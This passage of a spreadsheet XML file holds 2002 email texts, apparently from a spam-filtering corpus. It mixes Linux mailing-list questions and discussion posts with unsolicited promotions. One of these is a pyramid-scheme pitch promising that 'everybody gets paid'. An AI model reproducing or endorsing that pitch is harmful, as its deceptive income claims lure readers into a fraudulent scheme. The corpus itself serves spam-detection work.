 solution for the Latitude series doesn't seem to allow for the use of an IDE
 drive, only SCSI... Unless someone knows of a "non-Dell" solution that's
 compatible.
 Anyone any ideas?
 Thanks,
 Darren.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hertz Europe- 3 Day Weekend September Deals
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi part message in MIME format.
 --_NextPart_1_LTDtbEBFLbCEudrAQjXgSgCyoKl
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 Autumn Weekend Break Bonanza - Special 3 Day Weekend Deals=20
 Available to Ryanair passengers travelling during September*=20
 Our Car Hire partners, Hertz, have great rates for 3 day weekend=20
 rentals across Europe, during September. Providing you with the quality=20
 and reputation of Hertz, teamed up with Ryanair's lowest fares.=20
 To book online click http://www.ryanair.com/redirect/hertzredirect.html
 Hertz - 3 Day Weekend Rates for September***
 Rates below are expressed as daily rates=20
 Rent in FRANCE=09
 A 1.2 engine car from =A322.00 UK POUNDS OR EURO 35 PER DAY
 A 1.8 engine car from =A326.00 UK POUNDS OR EURO 41 PER DAY
 Rent in HOLLAND=09
 A 1.2 engine car from =A322.00 UK POUNDS OR EURO 35 PER DAY
 A 1.6 engine car from =A323.50 UK POUNDS OR EURO 37 PER DAY
 Rent in BELGIUM=09
 A 1.3 engine car from =A323.50 UK POUNDS OR EURO 37 PER DAY
 A 1.4 engine car from =A331.00 UK POUNDS OR EURO 49 PER DAY
 Rent in ITALY=09
 A 1.2 engine car from =A325.00 UK POUNDS OR EURO 39 PER DAY
 A 1.6 engine car from =A329.00 UK POUNDS OR EURO 46 PER DAY
 Rent in GERMANY=09
 A 1.2 engine car from =A324.50 UK POUNDS OR EURO 39 PER DAY
 A 1.6 engine car from =A329.00 UK POUNDS OR EURO 46 PER DAY
 Rent in IRELAND*=09
 A 1.2 engine car from =A327.50 UK POUNDS OR EURO 43 PER DAY
 A 1.4 engine car from =A330.00 UK POUNDS OR EURO 47 PER DAY
 Rent in the UK**=09
 A 1.2 engine car from =A330.00 UK POUNDS OR EURO 47 PER DAY
 A 1.6 engine car from =A335.50 UK POUNDS OR EURO 56 PER DAY
 =09
 HERTZ FULLY INCLUSIVE RATES INCLUDE:               =20
 UNLIMITED MILEAGE, COLLISION DAMAGE WAIVER,
 THEFT PROTECTION, AIRPORT FEE AND TAX
 To book online click http://www.ryanair.com/redirect/hertzredirect.html
 or call the Ryanair Direct - Hertz priority booking line on:
 0871 246 0002(UK only)
 0818 304 304 (Ireland)
 00 353 818 304 304 (International Calls)
 *Some black out dates apply in September=20
 **Rates for Bournemouth and Newquay are higher=20
 ***Weekend Rates are applicable only for cars picked up after=20
 12 midday Thursday and dropped off before 12 midday Tuesday
 All rates are subject to availability=20
 Rates are only available at Ryanair airport locations=20
 Drivers must be over 25 with a full clean driving licence
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
 E-MAIL DISCLAIMER
 This e-mail and any files and attachments transmitted with it=20
 are confidential and may be legally privileged. They are intended=20
 solely for the use of the intended recipient.  Any views and=20
 opinions expressed are those of the individual author/sender=20
 and are not necessarily shared or endorsed by Ryanair Holdings plc=20
 or any associated or related company. In particular e-mail=20
 transmissions are not binding for the purposes of forming=20
 a contract to sell airline seats, directly or via promotions,=20
 and do not form a contractual obligation of any type.  =20
 Such contracts can only be formed in writing by post or fax,=20
 duly signed by a senior company executive, subject to approval=20
 by the Board of Directors.
 The content of this e-mail or any file or attachment transmitted=20
 with it may have been changed or altered without the consent=20
 of the author.  If you are not the intended recipient of this e-mail,=20
 you are hereby notified that any review, dissemination, disclosure,=20
 alteration, printing, circulation or transmission of, or any=20
 action taken or omitted in reliance on this e-mail or any file=20
 or attachment transmitted with it is prohibited and may be unlawful.
 If you have received this e-mail in error=20
 please notify Ryanair Holdings plc by emailing postmaster@ryanair.ie
 or contact Ryanair Holdings plc, Dublin Airport, Co Dublin, Ireland. =20
 --_NextPart_1_LTDtbEBFLbCEudrAQjXgSgCyoKl
 Content-Type: application/ms-tnef
 Content-Transfer-Encoding: base64
 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
 KYIvgmQrsR+QHmAwcDCA/yUgKSEiIK1ZClCuMiFFl+HDKMQ9snN1YmqZAiJB/yPAIcMDEC7oqcir
 E7L1IhH3KJEidiKxcBhhMpFNQDAinSEmRAUQI9AjcW11MuF/JSAwYLgRnFBPoC4TH0Bm/nWX4ZNQ
 HqADoK7AuACalC5jCfC7ICV6fbxAAAAAHgA1EAEAAABIAAAAPEQxM0Y3QzA1NDdENzFGNENBNDA3
 MzI3QTgyNTEzNjAwMTlBMDg5QENIT1ZNQUlMMS5jaG8uY29ycC5yeWFuYWlyLmNvbT4AAwCAEP//
 //8DAJIQAwAAAB8A8xABAAAAYAAAAEgAZQByAHQAegAgAEUAdQByAG8AcABlAC0AIAAzACAARABh
 AHkAIABXAGUAZQBrAGUAbgBkACAAUwBlAHAAdABlAG0AYgBlAHIAIABEAGUAYQBsAHMALgBFAE0A
 TAAAAAsA9hAAAAAAQAAHMAOfw5SpSsIBQAAIMLjgqKqpSsIBAwDeP69vAAADAPE/CQQAAB4A+D8B
 AAAADAAAAENveWxlLCBTZWFuAAIB+T8BAAAAXQAAAAAAAADcp0DIwEIQGrS5CAArL+GCAQAAAAAA
 AAAvTz1SWUFOQUlSL09VPUZJUlNUIEFETUlOSVNUUkFUSVZFIEdST1VQL0NOPVJFQ0lQSUVOVFMv
 Q049Q09ZTEVTAAAAAB4A+j8BAAAAFQAAAFN5c3RlbSBBZG1pbmlzdHJhdG9yAAAAAAIB+z8BAAAA
 HgAAAAAAAADcp0DIwEIQGrS5CAArL+GCAQAAAAAAAAAuAAAAAwD9P+QEAAADABlAAAAAAAMAGkAA
 AAAAHgAwQAEAAAAHAAAAQ09ZTEVTAAAeADFAAQAAAAcAAABDT1lMRVMAAB4AOEABAAAABwAAAENP
 WUxFUwAAHgA5QAEAAAACAAAALgAAAAMAXUAAAAAAAwAJWQEAAAALAFiBCCAGAAAAAADAAAAAAAAA
 RgAAAAAOhQAAAAAAAAMAcIEIIAYAAAAAAMAAAAAAAABGAAAAAFKFAABZlAEAHgBxgQggBgAAAAAA
 wAAAAAAAAEYAAAAAVIUAAAEAAAAFAAAAMTAuMAAAAAAeAKaBCCAGAAAAAADAAAAAAAAARgAAAAA4
 hQAAAQAAAAEAAAAAAAAAHgCngQggBgAAAAAAwAAAAAAAAEYAAAAAN4UAAAEAAAABAAAAAAAAAB4A
 qIEIIAYAAAAAAMAAAAAAAABGAAAAADaFAAABAAAAAQAAAAAAAAADALiBCCAGAAAAAADAAAAAAAAA
 RgAAAAABhQAAAAAAAEAAuoEIIAYAAAAAAMAAAAAAAABGAAAAAGCFAAAAAAAAAAAAAAsAvYEIIAYA
 AAAAAMAAAAAAAABGAAAAAAOFAAAAAAAAAwDHgQggBgAAAAAAwAAAAAAAAEYAAAAAEIUAAAAAAAAD
 AM6BCCAGAAAAAADAAAAAAAAARgAAAAAYhQAAAAAAAAsA5YEIIAYAAAAAAMAAAAAAAABGAAAAAAaF
 AAAAAAAACwDpgQggBgAAAAAAwAAAAAAAAEYAAAAAgoUAAAAAAAALACkAAAAAAAsAIwAAAAAAAwAG
 EBcumwYDAAcQlQYAAAMAEBAAAAAAAwAREAAAAAAeAAgQAQAAAGUAAABBVVRVTU5XRUVLRU5EQlJF
 QUtCT05BTlpBLVNQRUNJQUwzREFZV0VFS0VORERFQUxTQVZBSUxBQkxFVE9SWUFOQUlSUEFTU0VO
 R0VSU1RSQVZFTExJTkdEVVJJTkdTRVBURU1CAAAAAAIBfwABAAAASAAAADxEMTNGN0MwNTQ3RDcx
 RjRDQTQwNzMyN0E4MjUxMzYwMDE5QTA4OUBDSE9WTUFJTDEuY2hvLmNvcnAucnlhbmFpci5jb20+
 AA/0
 --_NextPart_1_LTDtbEBFLbCEudrAQjXgSgCyoKl
 Content-Type: text/plain; charset="us-ascii"
 Content-description: footer
 ---
 You are currently subscribed to customers as: yyyy-ryanair@spamassassin.taint.org
 To unsubscribe send a blank email to leave-customers-949326K@mail.ryanairmail.com
 --_NextPart_1_LTDtbEBFLbCEudrAQjXgSgCyoKl--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: plate tectonics update
</t>
  </si>
  <si>
    <t xml:space="preserve">
 When we were discussing Kuhn, I wrote:
 &lt;http://www.xent.com/pipermail/fork/2001-July/001854.html&gt;
 &gt; My understanding of the history of
 &gt; plate tectonics is that the magnetic
 &gt; reversal patterns encoded in seafloor
 &gt; basalts were crucial supporting data
 &gt; which suddenly became available only
 &gt; after Navy declassification, so the
 &gt; adoption curve may be skewed.
 Many of the essays in Oreskes' _Plate
 Tectonics_ seem to support this idea:
 Sandwell, "Plate Tectonics: A Martian View"
 &gt; In this essay, I'll describe a few of the important confirmations of
 &gt; plate tectonic theory provided by satellites and ships.  These tools
 &gt; were largely developed to support the Cold War effort, and many are
 &gt; labeled geodetic since they are used to make precise measurements
 &gt; of the size and shape of the earth and the spatial variations in the
 &gt; pull of gravity.  The tools of satellite geodesy are needed for all
 &gt; aspects of global warfare; precise satellite tracking and gravity
 &gt; field development are needed for precision satellite surveillance
 &gt; as well as for targeting ballistic missiles; the global positioning
 &gt; system is used in all aspects of modern warfare; radar altimetery is
 &gt; used or aiming submarine-launched ballistic missiles as well as for
 &gt; inertial navigation when submerged.
 &gt; 
 &gt; The global seismic networks were developed, primarily, to monitor
 &gt; underground nuclear tests.  Marine magnetometers were developed,
 &gt; primarily, for detection of submarines.  Multibeam sea floor mapping
 &gt; systems were developed, primarily, for surveying critical and
 &gt; operational areas of the northern oceans.
 ... and the Navy was in no hurry
 to declassify any of these data,
 as any uneven coverage could have
 revealed the parts of the oceans
 they found most interesting.
 -Dave
 (What do our seismic networks say
 about the middle east?  I hazily
 recall a story about LA reporters
 asking their local geophysicists
 about an early morning quake, to
 be told that, as far as could be
 figured, the "epicenter" was at a
 negative depth, travelling near
 mach speed, and presumably headed
 towards Edwards)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: OpenGL
</t>
  </si>
  <si>
    <t xml:space="preserve">First, thanks for all the rpms, and especially ogle (which comes very close to 
 working perfectly on my Cyrix 333 box!).
 Now, I desperately need some games, especially TuxKart and FlightGear, but I 
 forever get stuck on a dependency: everything needs OpenGL. Querying the rpm 
 database for OpenGL gets me nowhere fast. Can anyone point me in the right 
 direction? What, in RedHat, provides OpenGL?
 Sorry for the question, but I've just switched from SuSE and I'm used to being 
 able to tell YaST to sort out the dependencies........
 Cheers
 John
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: quality subversion
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=52887
 Date: Not supplied
 http://www.livejournal.com/talkread.bml?journal=jwz&amp;itemid=52887
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG-Social] Everybody Gets Paid - No Recruiting Needed
</t>
  </si>
  <si>
    <t xml:space="preserve">Everybody gets paid.  No recruiting required.
 Join and reserve a position for free now.
 Program is 18 weeks old and it's paying.
 Everybody gets in line to get paid by all
 the new people coming in (but it's NOT a
 traditional straightline)...EVERYONE makes money...
 and those that sponsor make more....
 &lt;html&gt;
 &lt;a href="mailto:gmt101info@profitresponder.com?subject=send-more-info"&lt;b&gt;
 Click here to request for more information&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="mailto:stockbuyer@netzero.net?subject=REMOVE"&lt;b&gt;
 We belong to the same opt-in list. But if wish to have your email
 address REMOVE from our database please click here&lt;/b&gt;&lt;/a&gt;
 &lt;/html&gt;
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: "A billion here, a billion there..."
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Bottom line: the late Senate Minority Leader certainly would have 
 &gt; endorsed the meaning behind the phrase, but it is questionable that he 
 &gt; ever coined it.
 An interesting link courtesy of the Harrow Report: there's no written 
 evidence so far that Senator Everett Dirksen is the source of the 
 infamous quote attributed to him. It's kind of astounding that there is 
 enough general social consensus (25% of all queries makes it a *very* 
 FAQ) and "eyewitness" reporting without a single written source. What 
 the essay below doesn't seem to answer, though, is what the earliest 
 attributed quote in print by any other writer is. I'd naturally be much 
 more skeptical if the "quote" emerged after his death... RK
 ===============================================================
 http://www.dirksencenter.org/featuresBillionHere.htm
 "A billion here, a billion there . . ."
 Did Dirksen ever say, " A billion here, a billion there, and pretty soon 
 you're talking real money"? (or anything very close to that?)
 Perhaps not. Based on an exhaustive search of the paper and audio 
 records of The Dirksen Congressional Center, staffers there have found 
 no evidence that Dirksen ever uttered the phrase popularly attributed to 
 him.
 Archivists undertook the search after studying research statistics 
 showing that more than 25 percent of inquiries have to do with the quote 
 or its variations.
 Here is what they examined: all of the existing audio tapes of the famed 
 "Ev and Charlie" and "Ev and Jerry" shows, all newspapers clippings in 
 the Dirksen Papers, about 12,500 pages of Dirksen's own speech notes, 
 transcripts of his speeches and media appearances, transcripts of 
 Republican leadership press conferences, and Dirksen's statements on the 
 Senate floor as documented in the Congressional Record.
 Although Dirksen rarely prepared the text of a speech, preferring to 
 rely on notes, he did employ brief phrases to remind him of a particular 
 turn of phrase. For example, in referring to the public debt or 
 excessive government spending, Dirksen would jot the word "pothole" to 
 remind him to tell the following story, on this occasion in reference to 
 the debt ceiling:
 "As I think of this bill, and the fact that the more progress we make 
 the deeper we go into the hole, I am reminded of a group of men who were 
 working on a street. They had dug quite a number of holes. When they got 
 through, they failed to puddle or tamp the earth when it was returned to 
 the hole, and they had a nice little mound, which was quite a traffic 
 hazard.
 "Not knowing what to do with it, they sat down on the curb and had a 
 conference. After a while, one of the fellows snapped his fingers and 
 said, I have it. I know how we will get rid of that overriding earth 
 and remove the hazard. We will just dig the hole deeper.'" 
 [Congressional Record, June 16, 1965, p. 13884].
 On the same occasion, Dirksen relied on yet another "spending" story, 
 one he labeled "cat in the well":
 "One time in the House of Representatives [a colleague] told me a story 
 about a proposition that a teacher put to a boy. He said, Johnny, a cat 
 fell in a well 100 feet deep. Suppose that cat climbed up 1 foot and 
 then fell back 2 feet. How long would it take the cat to get out of the 
 well?'
 "Johnny worked assiduously with his slate and slate pencil for quite a 
 while, and then when the teacher came down and said, How are you 
 getting along?' Johnny said, Teacher, if you give me another slate and 
 a couple of slate pencils, I am pretty sure that in the next 30 minutes 
 I can land that cat in hell.'
 "If some people get any cheer our of a $328 billion debt ceiling, I do 
 not find much to cheer about concerning it." [Congressional Record, June 
 16, 1965, p. 13884].
 But there are no such reminders for the "A billion here, a billion 
 there . . . " tag line as there surely should have been given Dirksen's 
 note-making tendencies. He spoke often and passionately about the debt 
 ceiling, federal spending, and the growth of government. Yet there is no 
 authoritative reference to the "billion" phrase.
 The chief evidence in support of Dirksen making the statement comes from 
 people who claim to have heard him. The Library of Congress, for 
 example, cites someone's personal observation on the campaign trail as 
 evidence. The Dirksen Center has received calls from people who heard 
 Dirksen say those words, some even providing the date of the event. But 
 cross-checking that information with the records has, so far, turned up 
 nothing in the way of confirmation.
 The closest documented statement came at a joint Senate-House Republican 
 leadership press conference on March 8, 1962, when Dirksen said, "The 
 favorite sum of money is $1 billion  a billion a year for a fatter 
 federal payroll, a billion here, a billion there." [EMD Papers, 
 Republican Congressional Leadership File, f. 25] But the "and pretty 
 soon you're talking real money" is missing.
 In another close call, the New York Times, January 23, 1961, quoted 
 Dirksen: "Look at education  two-and-one-half billion  a billion for 
 this, a billion for that, a billion for something else. Three to five 
 billion for public works. You haven't got any budget balance left. 
 You'll be deeply in the red." [Cited in Byron Hulsey's "Everett Dirksen 
 and the Modern Presidents," Ph.D. dissertation (May 1998, University of 
 Texas, p. 226]
 Of course, the Dirksen Papers do not document completely the late 
 Senator's comments. For example, The Center that bears his name does not 
 have his testimony before committees. Their collection of Congressional 
 Records ends in 1965, omitting the last four years of Dirksen's life and 
 career  he might have employed the phrase only late, although witnesses 
 claim he said it throughout his career. Dirksen's campaign speeches 
 tended not to produce transcripts, only sketchy notes or abbreviated 
 newspaper accounts. Dirksen also held center stage before the video age, 
 meaning that many remarks, particularly those in campaigns, escaped 
 capture.
 Bottom line: the late Senate Minority Leader certainly would have 
 endorsed the meaning behind the phrase, but it is questionable that he 
 ever coined it.
 ---
 My permanent email address is khare@alumni.caltech.edu
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: hauns_froehlingsdorf@infinetivity.com
</t>
  </si>
  <si>
    <t xml:space="preserve">This is an automated response to a message you have sent to hauns_froehlingsdorf@infinetivity.com.
 I will be out of the office until Monday, August 26 2002.
 I will reply to your email when I return.
 Hauns
 ___________________________________
 Hauns Froehlingsdorf
 Network/Systems Manager
 infinetivity, inc.
 952-225.4200
 http://www.infinetivity.com
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "E" == Elias Sinderson &lt;elias@cse.ucsc.edu&gt; writes:
     E&gt; Gary Lawrence Murphy wrote
     &gt;&gt;&gt;&gt;&gt;&gt;&gt; "R" == Russell Turpin &lt;deafbox@hotmail.com&gt; writes:
     &gt;&gt;&gt;&gt;&gt;&gt;&gt; 
     &gt;&gt;
     R&gt; ... spam is the result of government. The government is
     R&gt; ineffective at preventing spam, but it DOES prevent individuals
     R&gt; and ISPs from taking retribution against spammers.
     &gt;&gt;  I don't understand this assertion.  Can you explain?  ...  So
     &gt;&gt; where does government come in to foster this?
     &gt;&gt; 
     E&gt; The government prevents me from hunting them down and flossing
     E&gt; with their sinew after I'm done with them. 
 This only restates the assertion, it doesn't clarify /how/ government
 restrains you, other than under laws of criminal conduct and violent
 crimes (if you meant the above literally)
 If I can trace a spammer to their ISP, I can /generally/ get that
 account revoked, and if you trace one to their parent corporation, I
 don't know of any law that specifically /exempts/ them from lawsuits,
 it's just that no one has yet succeeded in any important way.  If you
 have some law that prevents action against spammers, then why all the
 class-action suits and other anti-spam court cases, some even
 state-funded?
 I'm also curious of the mechanics of your retribution strategy: Let's
 say you did win a lawsuit and shut down the largest spammer network in
 the USA, do you really believe 40 Beijing spammers won't fill the
 void?  Do you really believe those 40 are not right now prepping their
 mail servers whether or not you prevail over your countrymen? How do
 you intend to take legal (and/or violent) action against people a
 world away and in a culture you can barely understand let alone
 understand how to properly bribe?  
 I'm not so hopeful this method can work against aromatherapy viagra
 when we can't even track and convict murderous Nigerian mafia, and
 they are blatant!  Political solution is a contradiction in terms, and
 it's also true that no lawmaker has ever been even a tenth the
 catalyst on improving the quality of life in Britain and the western
 world as did central heating and the invention of one A.J.Crapper.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
 Business Innovations Through Open Source Systems: http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Michael Jordan may announce he's coming back to play. Dead horse
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8256507,1717/
 Date: 2002-09-25T23:11:07+01:00
 [IMG: http://www.newsisfree.com/Images/fark/msnbc2.gif ([MSNBC])]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Musharraf keeps his hands on the reins
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8723994,215/
 Date: 2002-10-10T03:26:57+01:00
 *World latest:* Warning to next PM as Pakistan goes to the polls.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Sheila Lennon was interviewed for the Times piece.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/23#When:8:25:14AM
 Date: Mon, 23 Sep 2002 15:25:14 GMT
 Sheila Lennon was interviewed[1] for the Times piece.
 [1] http://www.lennon2.com/sept23.htm
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Join Focus Groups to earn money
</t>
  </si>
  <si>
    <t xml:space="preserve">This is an HTML email message.  If you see this, your mail client does not support HTML messages.
 ------=_NextPart_NPJNMJMMFS
 Content-Type: text/html;charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 A La Carte Research recruits for Focus Groups across the country.  Focus Groups&lt;br&gt;
 are an easy way to make some extra money for just a couple of hours of your&lt;br&gt;
 time.  Each group is only for the purpose of learning your opinions.  You can &lt;br&gt;
 be assured that there will be no sales presentation, and you will not be asked &lt;br&gt;
 to buy anything.  Everything that is mentioned will be held in the strictest of &lt;br&gt;
 confidence.  Focus Groups let you express your opinions on whatever subject is &lt;br&gt;
 being discussed and we actually pay you for those opinions.&lt;br&gt;
 &lt;br&gt;
 If you would like to be added to our list of possible future respondents, then &lt;br&gt;
 click to fill out the &lt;b&gt;&lt;a href="http://www.alacarteresearch.com/register.asp"&gt;&lt;blink&gt;&lt;font size="3" color="202498"&gt;registration form&lt;/font&gt;&lt;/blink&gt;&lt;/a&gt;&lt;/b&gt;.  If you have any questions about this &lt;br&gt;
 questionnaire, please e-mail me at register@alacarteresearch.com&lt;br&gt;
 &lt;br&gt;
 Sincerely,&lt;br&gt;
 John Mooney
 ------=_NextPart_NPJNMJMMFS--
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; All else being equal, the terminal velocity is inversely proportional to the
 &gt; square root of air density. Air density drops off pretty quickly, and I 
 &gt; really should be doing something other than digging up the math for that. I
 &gt; think it involves calculus to integrate the amount of mass as the column of
 &gt; the atmosphere trails off.
 Chemistry types have a method for
 dealing with this question without
 dragging in the calculus:
 Suppose an atmosphere to be mainly
 affected by gravity, resulting in
 the potential energy for a mass M
 to be linear in height h: Mgh.
 What relative concentrations will
 we have when two different packets
 of air are in equilibrium?
 If they are at the same height, we
 will have half the mass in one, and
 half the mass in the other, and the
 amount flowing from one to the other
 balances the amount flowing in the
 opposite direction.[0]
 If they are at differing heights,
 then a greater percentage of the
 higher air tends to descend than
 that percentage of the lower air
 which ascends.  In order for the
 two flows to balance, the higher
 packet must contain less air than
 the lower, and the mass balance
 of the flows corresponds thusly:
     high percentage of thin air
     ---------------------------
     low percentage of dense air
 Now, rates are exponential in
 energy differences[1], so that
 theoretically we should expect
 an exponential decay in height,
 to compensate.  How does it go
 in practice?
 -Dave
 [0] How well does it balance?
     Chemical equilibria seem 
     stable, as they deal with
     very large numbers over a
     very long time.  Economic
     equilibria are viewed from
     the mayfly standpoint of
     individual people, and so,
     at best, the shot noise is
     very visible.
 [1] That is to say, rates will
     be exponential in the free
     energy differences between
     endpoints and a transition
     state.  We can ignore that
     complication in this model.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 2002-08-29 at 19:27, Barry Dexter A. Gonzaga wrote:
 &gt; On Thu, Aug 29, 2002 at 05:10:47PM -0400, Larry W. Virden wrote:
 &gt; &gt; I am wondering whether there's a way that I can use sitescooper and/or plucker
 &gt; &gt; or some other free utility to convert word documents into something a bit
 &gt; &gt; more palmos friendly?
 &gt; 
 &gt; 	You could try antiword (http://www.winfield.demon.nl/linux/).
 &gt; It's consoled based and converts word 6+ docs to text and some images to
 &gt; postscript and png.
 also there's catdoc and wv for Word --&gt; text conversions.  actually, wv
 consists of wvWare, which as the manpage says "converts word documents
 into other formats such as PS, PDF, HTML, LaTeX, DVI, ABW".  HTML would
 probably be the best format for use with Plucker/SiteScooper, depending
 on how good the DOC --&gt; HTML conversion is.  i haven't used either in
 over a year as AbiWord or OpenOffice work well enough.  (prefer AbiWord
 for it's light-weight size, but OpenOffice has the better DOC importer.)
 don't know which of these are better or worse than the other, but i
 figure, "the more the merrier". ;-)
 &gt; You could also try openoffice and/or abiword if you
 &gt; have x installed.
 AbiWord supports exporting to PalmDoc (.pdb) which is about as
 PalmOS-friendly as you can get.  never tried/needed it, but it's listed
 there in the "Save As" dialog box.
 Wine (or CrossOver Office, if you already have it) may support Word
 Viewer (free download from Microsoft), but didn't a year or so ago when
 i last tried.  Word Viewer is what i used back in the day to convert
 Word 97 docs to Word 95, as you could display the Word 97 doc and copy &amp;
